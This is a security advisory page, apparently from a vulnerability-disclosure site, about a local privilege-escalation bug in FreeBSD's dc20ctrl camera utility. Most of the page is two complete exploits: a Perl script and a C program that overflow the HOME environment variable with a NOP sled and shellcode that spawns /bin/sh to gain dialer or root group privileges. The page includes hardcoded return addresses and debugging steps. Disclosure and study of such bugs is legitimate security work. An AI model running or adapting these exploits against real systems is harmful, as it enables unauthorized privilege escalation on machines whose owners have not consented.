|
Brought to you by:
Suppliers of:
|
|
|
| |
| DC20ctrl allows an administrator to control his Kodak DC20 digital camera via the embedded serial port. A security vulnerability in the product allows gaining of elevated privileges. |
| |
Credit:
The information has been provided by dethy. The C exploit code was written by Mray.
|
| |
The exploit code below can be used to test for this vulnerability.
Exploit:
#!/usr/bin/perl
# FreeBSD 3.x/4.X dc20ctrl local exploit
# should yield gid(dialer) or gid(root) on non-fbsd systems.
#
# vulnerability lies in session.c in getenv(), other bugs
# exist, such as the -P with 344 byte arg, overwriting %ecx.
# To get $ret do: export HOME=`perl -e 'print "A"x520'`; dc20ctrl;
# gdb dc20ctrl -c dc20ctrl.core ; in gdb type: info reg $esp
#
# code by dethy - Feb 10 2001.
# dethy@synnergy.net / www.synnergy.net
#
$shellcode = "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76".
"\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b".
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff".
"\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff".
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02".
"\x02\x02\x02/bin/sh.-c.sh";
$ret = 0xbfbff79c; # FreeBSD 4.2
$buf = 520;
$egg = 1000;
$nop = "\x90";
print "\nFreeBSD dc20ctrl local exploit by dethy\n\n";
foreach $key (keys %ENV) {
delete $ENV{$key}; # avoid offset guessing
}
$addr = pack('l', $ret);
for ($i = 0; $i < $buf; $i += 4) { $buffer .= $addr; }
for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
$ENV{'HOME'} = $buffer;
exec("./usr/local/bin/dc20ctrl", 0);
Additional Exploit Code:
The following is a similar exploit code in C:
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#define BSIZE 520
#define EIP 0xbfbfdcb8
#define NOP 0x90
#define PATH "/usr/local/bin/dc20ctrl"
char shellcode[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07"
"\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b"
"\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8"
"\xff\xff\xff/bin/sh\x01\x01\x01\x01\x02\x02\x02\x02"
"\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
int main(int argc, char *argv[]) {
char *buf = NULL, *p = NULL;
long *addressp = NULL, address=EIP;
int offset=0,i=0;
if(argc > 1){
offset = atoi(argv[1]);
}
address -= offset;
if (!(buf = (char *)malloc(BSIZE))) {
printf("error malloc()\n");
exit(-1);
}
p = buf;
addressp = (long *) p;
for (i = 0; i < BSIZE; i+=4) {
*(addressp++) = address;
}
for (i = 0; i < (BSIZE - strlen(shellcode) - 4); i++) {
buf[i] = NOP;
}
p = buf + (BSIZE - strlen(shellcode) - 4);
for (i = 0; i < strlen(shellcode); i++) {
*(p++) = shellcode[i];
}
buf[BSIZE] = '\0';
printf("ADDRESS 0x%lx OFFSET %d\n", address,offset);
setenv("HOME", buf, 1);
execlp(PATH, "dc20ctrl","-P","alien88izretarded", 0);
}
|
|
|
|
|
